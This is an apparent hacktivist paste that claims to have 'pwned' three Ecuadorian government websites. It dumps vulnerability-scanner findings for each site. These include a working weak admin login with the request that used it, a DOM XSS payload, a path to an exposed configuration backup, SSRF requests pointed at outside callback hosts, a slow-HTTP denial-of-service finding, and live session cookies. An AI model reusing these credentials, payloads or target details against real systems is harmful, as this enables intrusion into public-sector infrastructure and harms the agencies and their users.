API tools faq
paste
Advertisement
Guest User

#OPECUADOR AL1NE3737

a guest
Apr 12th, 2019
1,450
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.34 KB | None | 0 0
raw download clone embed print report
  1. ____ _
  2. | _ \ _ __ _ _ _____ __ __ _| | ___ _
  3. | |_) | '__| | | |_ / '__/ _` | |/ / | | |
  4. | __/| | | |_| |/ /| | | (_| | <| |_| |
  5. |_| |_| \__, /___|_| \__,_|_|\_\\__, |
  6. |___/ |___/
  7.  
  8.  
  9.  
  10. Agrocalidad – La Agencia de Regulación y Control Fito y Zoosanitario: http://www.agrocalidad.gob.ec/
  11.  
  12. Agencia Metropolitana de Tránsito: http://www.amt.gob.ec/
  13.  
  14. Instituto Geográfico Militar - Ecuador: http://www.igm.gob.ec/
  15.  
  16.  
  17.  
  18. PWNED BY AL1NE3737
  19.  
  20. We are: Al1ne3737 // Mecz1nho // Ergo // Poptart // TkaTheGod // Xoha.
  21.  
  22.  
  23. Seorang anak yang lahir hari ini akan tumbuh tanpa konsepsi privasi.
  24. Mereka tidak akan pernah tahu apa artinya memiliki momen tertentu untuk diri mereka sendiri
  25. pemikiran yang tidak terdaftar dan tidak dianalisis.
  26. Dan itu masalah karena privasi itu penting; privasi adalah apa yang memungkinkan
  27. kita untuk menentukan siapa kita dan siapa yang kita inginkan.
  28.  
  29.  
  30. http://www.agrocalidad.gob.ec/
  31.  
  32. Vulnerability description
  33. Manual confirmation is required for this alert.
  34.  
  35. This page is using a weak password. Acunetix WVS was able to guess the credentials required to access this page. A weak password is short, common, a system default, or something that could be rapidly guessed by executing a brute force attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on the user name or common variations on these themes.
  36. This vulnerability affects /revistaecuadorescalidad/index.php/revista/user/registerUser.
  37. Discovered by: Scripting (Html_Authentication_Audit.script).
  38. Attack details
  39. Username: admin, Password: 1
  40.  
  41.  
  42. POST /revistaecuadorescalidad/index.php/revista/user/registerUser HTTP/1.1
  43. Content-Length: 47
  44. Content-Type: application/x-www-form-urlencoded
  45. Referer: http://www.agrocalidad.gob.ec/
  46. Host: www.agrocalidad.gob.ec
  47. Connection: Keep-alive
  48. Accept-Encoding: gzip,deflate
  49. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
  50. Accept: */*
  51.  
  52. existingUser=admin&password=1&username=gfharbgv
  53.  
  54.  
  55. Vulnerability description
  56. This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.
  57.  
  58. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
  59.  
  60. While a traditional cross-site scripting vulnerability occurs on the server-side code, document object model based cross-site scripting is a type of vulnerability which affects the script code in the client's browser.
  61. This vulnerability affects /coordinacion-general-de-sanidad-vegetal.
  62. Discovered by: DeepScan.
  63. Attack details
  64. Source: Location
  65. Location: http://www.agrocalidad.gob.ec/coordinacion-general-de-sanidad-vegetal/?wvstest=javascript:domxssExecutionSink(1,"<br>()locxss")edge.sharethis.comjavascript:domxssExecutionSink(1,"<br>()locxss")
  66. Execution Sink: set HTML code
  67. HTML code set:
  68. brary/js/fillsize.js?ver=4.7.4"></script>
  69. <script type="text/javascript" src="http://www.agrocalidad.gob.ec/wp-content/themes/Sitio-32/library/js/jquery.arctext.js?ver=4.7.4"></script>
  70. <script type="text/javascript" src="http://www.agrocalidad.gob.ec/wp-includes/js/wp-embed.min.js?ver=4.7.4"></script>
  71. <script type="text/javascript">
  72. /* <![CDATA[ */
  73. var icegram_pre_data = {"ajax_url":"http:\/\/www.agrocalidad.gob.ec\/wp-admin\/admin-ajax.php","post_obj":{"wvstest":"javascript:domxssExecutionSink(1,\\\"<br>()locxss\\\")edge.sharethis.comjavascript:domxssExecutionSink(1,\\\"<br>()locxss\\\")","is_home":false,"page_id":23039,"action":"display_messages","shortcodes":[],"cache_compatibility":"no","device":"laptop"}};
  74. /* ]]> */
  75. </script>
  76. <script type="text/javascript" src="http://www.agrocalidad.gob.ec/wp-content/plugins/icegram/assets/js/main.min.js?ver=1.10.25"></script>
  77. <script type="text/javascript" src="http://www.agrocalidad.gob.ec/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4"></script> ...
  78.  
  79. ================================================================================================================================================================================================================================================================================================================================================================================================================
  80.  
  81. ================================================================================================================================================================================================================================================================================================================================================================================================================
  82.  
  83. http://www.amt.gob.ec/
  84.  
  85. Vulnerability description
  86. A backup/temporary configuration file was found on this directory. It has been confirmed that this file contains PHP source code.
  87.  
  88. Several popular text editors like Vim and Emacs automatically create backup copies of the files you edit, giving them names like "wp-config.php~" and "#wp-config.php#". If the text editor crashes or the SSH connection drops during editing, then the temporary backup files may not be cleaned up correctly. Also, sometimes developers create this type of files to backup their work or by administrators when making backups of the web server. Most servers, including Apache, will serve the plaintext of .php~ and .php# files without passing them through the PHP preprocessor first, since they don't have the .php file extension.
  89. This vulnerability affects //configuration.php_old.
  90. Discovered by: Scripting (Config_File_Disclosure.script).
  91. Attack details
  92. Configuration file variant found: configuration.php_old
  93.  
  94.  
  95. <?php
  96. class JConfig {
  97. public $MetaAuthor = '0';
  98. public $MetaDesc = 'Corpaire, Revisi
  99.  
  100.  
  101.  
  102. GET //configuration.php_old HTTP/1.1
  103. Cookie: 55f9c737a043904db80b5aaa56757816=tiv41n24ip0mbbaeseen0sl7q6
  104. Host: www.amt.gob.ec
  105. Connection: Keep-alive
  106. Accept-Encoding: gzip,deflate
  107. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
  108. Accept: */*
  109.  
  110.  
  111. URL encoded GET input id was set to http://hitwVLQActFjo.bxss.me/
  112.  
  113. An HTTP request was initiated for the domain hitwVLQActFjo.bxss.me which indicates that this script is vulnerable to SSRF (Server Side Request Forgery).
  114.  
  115. HTTP request details:
  116.  
  117. IP address: 186.42.161.194
  118. User agent:
  119.  
  120.  
  121. URL encoded GET input id was set to http://hitKcR7eAhIfU.bxss.me/
  122.  
  123. An HTTP request was initiated for the domain hitKcR7eAhIfU.bxss.me which indicates that this script is vulnerable to SSRF (Server Side Request Forgery).
  124.  
  125. HTTP request details:
  126.  
  127. IP address: 186.42.161.194
  128. User agent:
  129.  
  130.  
  131. URL encoded GET input id was set to http://hitNQhVvvMrYH.bxss.me/
  132.  
  133. An HTTP request was initiated for the domain hitNQhVvvMrYH.bxss.me which indicates that this script is vulnerable to SSRF (Server Side Request Forgery).
  134.  
  135. HTTP request details:
  136.  
  137. IP address: 186.42.161.194
  138. User agent:
  139.  
  140. html => 69 file(s)
  141. css => 22 file(s)
  142. js => 29 file(s)
  143. php => 2 file(s)
  144. txt => 1 file(s)
  145. md => 1 file(s)
  146.  
  147. The files listed below had the slowest response times measured during the crawling process. The average response time for this site was 136,07 ms. These files could be targetted in denial of service attacks.
  148.  
  149. 1. /, response time 1438 ms
  150.  
  151. These files contain Javascript code referenced from the website.
  152.  
  153.  
  154. /components/com_k2/js/k2.js
  155. /components/com_roksprocket/layouts/lists/themes/default/lists.js
  156. /components/com_roksprocket/assets/js/mootools-mobile.js
  157. /components/com_roksprocket/assets/js/rokmediaqueries.js
  158. /components/com_roksprocket/assets/js/roksprocket.js
  159. /components/com_roksprocket/assets/js/roksprocket.request.js
  160. /media/widgetkit/widgets/twitter/twitter.js
  161. /media/widgetkit/widgets/slideshow/js/lazyloader.js
  162. /media/widgetkit/js/jquery.plugins.js
  163. /media/widgetkit/js/responsive.js
  164. /media/modals/js/jquery.colorbox-min.js
  165. /media/modals/js/script.min.js
  166. /media/com_uniterevolution2/assets/rs-plugin/js/jquery.themepunch.tools.min.js
  167. /media/com_uniterevolution2/assets/rs-plugin/js/jquery.themepunch.revolution.min.js
  168. /media/system/js/mootools-core.js
  169. /media/system/js/core.js
  170. /media/system/js/mootools-more.js
  171. /media/jui/js/jquery.min.js
  172. /media/jui/js/jquery-noconflict.js
  173. /media/jui/js/jquery-migrate.min.js
  174. /media/jui/js/bootstrap.min.js
  175. /templates/corposs_template/js/menu.js
  176. /templates/corposs_template/js/custom.js
  177. /plugins/system/helix/js/jquery-noconflict.js
  178. /plugins/system/helix/js/modernizr-2.6.2.min.js
  179. /plugins/system/helix/js/helix.core.js
  180. /plugins/system/rokbox/assets/js/rokbox.js
  181. /plugins/system/imageeffectck/assets/imageeffectck.js
  182. /js/custom.js
  183.  
  184. These files have at least one input (GET or POST).
  185.  
  186.  
  187. /index.php - 1 inputs
  188. /index.php/servicios/matriculacion-vehicular-menu/pasos-para-matricular-vehiculos-exonerados.html - 1 inputs
  189. /index.php/component/content/article.html - 1 inputs
  190.  
  191. ================================================================================================================================================================================================================================================================================================================================================================================================================
  192.  
  193. ================================================================================================================================================================================================================================================================================================================================================================================================================
  194.  
  195. http://www.igm.gob.ec/modules/mod_zt_news/timthumb.php?h=49&src=http://hitbZVfbiq3NS.bxss.me/&w=49
  196.  
  197. SSRF as in Server Side Request Forgery is a vulnerability that allows an attacker to force server interfaces into sending packets initiated by the victim server to the local interface or to another server behind the firewall. Consult Web References for more information about this problem.
  198. This vulnerability affects /modules/mod_zt_news/timthumb.php.
  199. Discovered by: Scripting (Server_Side_Request_Forgery.script).
  200.  
  201. GET /modules/mod_zt_news/timthumb.php?h=49&src=http://hitbZVfbiq3NS.bxss.me/&w=49 HTTP/1.1
  202. Cookie: e2c123c3eda5a6a92093f2e5d7b558f5=s0agqu76f570u4mbgh9g1endd6; 86ee5050f0600801d8617940d052722d=en-GB; c8027f0722a323fc3a1fd1fb51cb797f=s9pnq0tq2plb0t07udhpgcilh0
  203. Host: www.igm.gob.ec
  204. Connection: Keep-alive
  205. Accept-Encoding: gzip,deflate
  206. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
  207. Accept: */*
  208.  
  209. Fixed in Apache httpd 2.2.10:
  210.  
  211. low: mod_proxy_ftp globbing XSS CVE-2008-2939
  212. A flaw was found in the handling of wildcards in the path of a FTP URL with mod_proxy_ftp. If mod_proxy_ftp is enabled to support FTP-over-HTTP, requests containing globbing characters could lead to cross-site scripting (XSS) attacks.
  213.  
  214. Affected Apache versions (2.2.9, 2.2.8, 2.2.6, 2.2.5, 2.2.4, 2.2.3, 2.2.2, 2.2.0).
  215.  
  216. This vulnerability affects Web Server.
  217. Discovered by: Scripting (Version_Check.script).
  218.  
  219.  
  220. Category : Files containing juicy info
  221.  
  222. Files uploaded through ftp by other people, sometimes you can find all sorts of things from movies to important stuff.
  223.  
  224. The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.
  225. Affected items
  226. /templates/zo2_charity/assets/zo2/development/images/typo
  227. /templates/zo2_charity/assets/zo2/images/typo
  228.  
  229. /administrator
  230. /index.php/en/component/users
  231.  
  232. This vulnerability affects Web Server.
  233. Discovered by: Slow_HTTP_DOS.
  234. Attack details
  235. Time difference between connections: 9969 ms
  236.  
  237. ================================================================================================================================================================================================================================================================================================================================================================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!